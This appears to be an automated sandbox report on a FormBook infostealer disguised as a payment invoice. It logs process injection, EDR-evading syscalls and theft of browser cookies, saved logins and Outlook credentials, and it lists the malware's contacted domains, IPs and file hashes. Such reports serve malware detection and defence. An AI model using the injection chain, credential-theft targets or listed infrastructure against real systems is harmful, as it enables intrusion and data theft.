                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01098D10 mov eax, dword ptr fs:[00000030h]3_2_01098D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01098D10 mov eax, dword ptr fs:[00000030h]3_2_01098D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01014D1D mov eax, dword ptr fs:[00000030h]3_2_01014D1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01068D20 mov eax, dword ptr fs:[00000030h]3_2_01068D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDCCC8 mov eax, dword ptr fs:[00000030h]3_2_00FDCCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078D6B mov eax, dword ptr fs:[00000030h]3_2_01078D6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8C8D mov eax, dword ptr fs:[00000030h]3_2_00FD8C8D
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: NULL target: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exe; Section loaded: NULL target: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exe; Section loaded: NULL target: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exe; Thread register set: target process: 4816
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 739008
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe; Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: cJjnESPXORw.exe, 00000005.00000002.3912307416.0000000001081000.00000002.00000001.00040000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000000.2345394450.0000000001081000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
                Source: cJjnESPXORw.exe, 00000005.00000002.3912307416.0000000001081000.00000002.00000001.00040000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000000.2345394450.0000000001081000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: cJjnESPXORw.exe, 00000005.00000002.3912307416.0000000001081000.00000002.00000001.00040000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000000.2345394450.0000000001081000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: cJjnESPXORw.exe, 00000005.00000002.3912307416.0000000001081000.00000002.00000001.00040000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000000.2345394450.0000000001081000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\xcopy.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\xcopy.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xcopy.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xcopy.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\xcopy.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\xcopy.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 512 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 512 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
Behavior Graph ID: 1541207 | Sample: Due Payment Invoice PISS202... | Startdate: 24/10/2024 | Architecture: WINDOWS | Score: 100

[Behavior graph figure; nodes and edges as listed in the graph]
Graph-level DNS/IP: www.theawareness.shop; www.shintow.net; 13 other IPs or domains
Graph-level signatures: Multi AV Scanner detection for submitted file; Yara detected FormBook; Yara detected AntiVM3; 4 other signatures
• Due Payment Invoice PISS2024993.exe (started)
  dropped: Due Payment Invoice PISS2024993.exe.log, ASCII
  signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
• RegSvcs.exe (started from Due Payment Invoice PISS2024993.exe)
  signatures: Maps a DLL or memory area into another process
• cJjnESPXORw.exe (injected from RegSvcs.exe)
  DNS/IP: estrela-b.online 162.241.63.77, 49996, 49997, 49998 UNIFIEDLAYER-AS-1US United States; ghs.googlehosted.com 142.250.185.115, 49949, 49964, 49978 GOOGLEUS United States; 7 other IPs or domains
  signatures: Found direct / indirect Syscall (likely to bypass EDR)
• xcopy.exe (started from cJjnESPXORw.exe)
  signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
• firefox.exe (started from xcopy.exe)

Source | Detection | Scanner | Label | Link
Due Payment Invoice PISS2024993.exe | 34% | ReversingLabs | Win32.Trojan.Generic |
Due Payment Invoice PISS2024993.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1541207
Start date and time: 2024-10-24 15:28:00 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Due Payment Invoice PISS2024993.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@10/9
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 191
• Number of non-executed functions: 243
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: Due Payment Invoice PISS2024993.exe
Time | Type | Description
09:30:04 | API Interceptor | 5611021x Sleep call for process: xcopy.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                            No context
                                                                                            No context
                                                                                            Process:C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.34331486778365
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):1.121297215059106
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.940725986819091
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            File name:Due Payment Invoice PISS2024993.exe
                                                                                            File size:764'928 bytes
                                                                                            MD5:e36a9532eb81c28dd0ed418c61774138
                                                                                            SHA1:63842c24e62c29a7695134da51e6cfa7654ce2d4
                                                                                            SHA256:5bf41f92b016c6c045f3b10573788b4c7cc6b11e20b2a57ae5d4943c1b160da4
                                                                                            SHA512:32c38352431c3a292f44f7342e13b4788f1e5c5f9e3ad0de30661518a2f224c1b593ce34998b17d150b3923fb02afe0c84cd653c54e5b8d53cc7382d541534db
                                                                                            SSDEEP:12288:QCfia3VrRRDPntqbMFrP62V1dHGwk2GvZBSBjUI5v/wxDPVvs:QYiG7DPniMV6+j02GvXmjULxjVv
                                                                                            TLSH:9BF412546BD48722C17E7BF909B650B123F2B5AB2837E35C8DC608EE1E77B004A9571B
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T................0.................. ........@.. ....................................@................................
                                                                                            Icon Hash:00928e8e8686b000
                                                                                            Entrypoint:0x4bbff2
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0xC0E554B8 [Wed Jul 20 15:41:44 2072 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [ebp+00h], al
                                                                                            push edx
                                                                                            add byte ptr [ebx+00h], dl
                                                                                            dec ecx
                                                                                            add byte ptr [edi+00h], cl
                                                                                            dec esi
                                                                                            add byte ptr [edi+00h], bl
                                                                                            dec ecx
